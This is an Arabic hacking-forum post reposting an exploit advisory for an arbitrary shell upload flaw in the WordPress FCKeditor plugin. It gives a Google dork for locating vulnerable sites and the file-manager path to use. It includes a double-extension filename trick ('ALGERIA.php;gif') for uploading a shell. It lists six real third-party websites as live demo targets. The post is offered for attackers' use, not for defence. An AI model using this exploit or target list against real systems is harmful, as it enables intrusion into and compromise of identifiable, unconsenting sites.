:: vBspiders Professional Network :: - عرض مشاركة واحدة

b10001 · 07-18-2011, 02:07 AM

بسم الله آرحمن الرحيم
و السلام عليكم

اخوكم spy'FlY رح يقدم لكم ثغرة التحميل في الوردبريس

الثغرة

PHP

كود PHP:

  1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0

0     _                   __           __       __                     1

1   /' \            __  /'__`\        /\ \__  /'__`\                   0

0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1

1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0

0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1

1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0

0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1

1                  \ \____/ >> Exploit database separated by exploit   0

0                   \/___/          type (local, remote, DoS, etc.)    1

1                                                                      1

0  [+] Site            : 1337day.com                                   0

1  [+] Support e-mail  : submit[at]1337day.com                         1

0                                                                      0

1               #########################################              1

0               I'm KedAns-Dz member from Inj3ct0r Team                1

1               #########################################              0

0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

 
###

# Title : WordPress Plugin (FCKeditor) File Upload Vulnerability

# Author : KedAns-Dz

# E-mail : ked-h@hotmail.com (ked-h@1337day.com) | ked-h@exploit-id.com

# Home : Hassi.Messaoud (30008) - Algeria -(00213555248701)

# Web Site : www.1337day.com * www.exploit-id.com * www.dis9.com

# Twitter page : twitter.com/kedans | http://kedans.dis9.com

# platform : php

# Impact : Arbitrary Shell Upload

##

# <3 Liyan Oz + All UE-Team & I.BackTrack Team & indoushka <3

##

# URL : [http://http://wordpress.ckeditor.com/]

###

 
# 'FCK/CK' Editor : 

~~~~~~~~~~~~~~~~~~~~

(Frederico Caldeira Knabben, Editor) =>

This Module Is Files Controller and files manager , 

You are Can Upload The Files and Include The Remote Files From the FCKEditor

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

 
# (+) Go0gle DorK : inurl:/fckeditor-for-wordpress-plugin/filemanager/browser/default/browser.html

 
# (!) Exploits & PoC :

 
#=========[ Upload File/Shell (via Browser) ]======>

 
+> http://[target]/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/browser/default/browser.html

+> Upload Shell/File ALGERIA.php;gif ... ^^

 
-> find him in : http://[target]/[User-file]/ALGERIA.php;gif

 
# (+) Demo :

 
http://www.omegatv.tv/blog_omegatv/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/browser/default/browser.html

http://www.wannabesupermom.com/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/browser/default/browser.html

http://smsjm.vse.cz/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/browser/default/browser.html

http://www.powersbikeshop.com/_wp/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/browser/default/browser.html

http://dechezmoiauboulotavelo.fr/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/browser/default/browser.html

http://radio-trianon.fr/site/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/browser/default/browser.html

 
# Note : the Dork and Demo's Greets to : [ R0f BenNasr ] <3

 
# (^_^) ! Good Luck ALL ...

المصدر: :: vBspiders Professional Network ::

eyvm hgjpldg td hg,v]fvds